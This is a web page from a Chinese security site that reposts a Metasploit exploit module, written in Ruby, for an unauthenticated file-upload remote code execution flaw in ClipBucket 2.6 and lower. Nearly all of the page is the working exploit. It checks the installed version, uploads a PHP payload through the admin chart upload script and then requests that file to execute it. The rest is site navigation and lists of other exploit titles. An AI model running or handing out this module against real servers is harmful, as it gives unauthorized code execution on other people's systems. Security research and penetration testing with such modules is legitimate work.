首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ClipBucket Remote Code Execution
来源:metasploit.com 作者:Gabby 发布时间:2013-10-08  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ClipBucket Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
        The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
        upload arbitrary code without any authentication. This module has been tested
        on version 2.6 on CentOS 5.9 32-bit.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Gabby', # Vulnerability Discovery, PoC
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'      =>
        [
          [ 'URL', 'http://packetstormsecurity.com/files/123480/ClipBucket-Remote-Code-Execution.html' ]
        ],
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         =>
        [
          ['Clipbucket 2.6', {}]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => "Oct 04 2013",
      'DefaultTarget'   => 0))

    register_options(
      [
       OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ], self.class)
  end

  def uri
    return target_uri.path
  end

  def check
    # Check version
    peer = "#{rhost}:#{rport}"

    print_status("#{peer} - Trying to detect installed version")

    res = send_request_cgi({
     'method' => 'GET',
     'uri'    => normalize_uri(uri, "")
    })

    if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - Version #{version} detected")

    if version > "2.6"
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"

    print_status("#{peer} - Uploading payload [ #{payload_name} ]")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
      'headers'  => { 'Content-Type' => 'text/plain' },
      'vars_get' => { 'name' => payload_name },
      'data'  => payload.encoded
    })

    # If the server returns 200 we assume we uploaded the malicious
    # file successfully
    if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
    end

    register_files_for_cleanup(payload_name)

    print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" )
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.
    if res and res.code != 200
      print_error("#{peer} - Unexpected response, probably the exploit failed")
    end

  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FlashChat Arbitrary File Uploa
·GestioIP Remote Command Execut
·Apple Motion 5.0.7 Integer Ove
·HP LoadRunner magentproc.exe O
·Ice Cold Apps Servers Ultimate
·glibc and eglibc 2.5, 2.7, 2.1
·Evince PDF Reader 2.32.0.145 /
·KMPlayer 3.7.0.109 (.wav) - Cr
·FreeBSD Intel SYSRET Kernel Pr
·Microsoft Internet Explorer Se
·SIEMENS Solid Edge ST4 SEListC
·Firefox For Android Same-Origi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved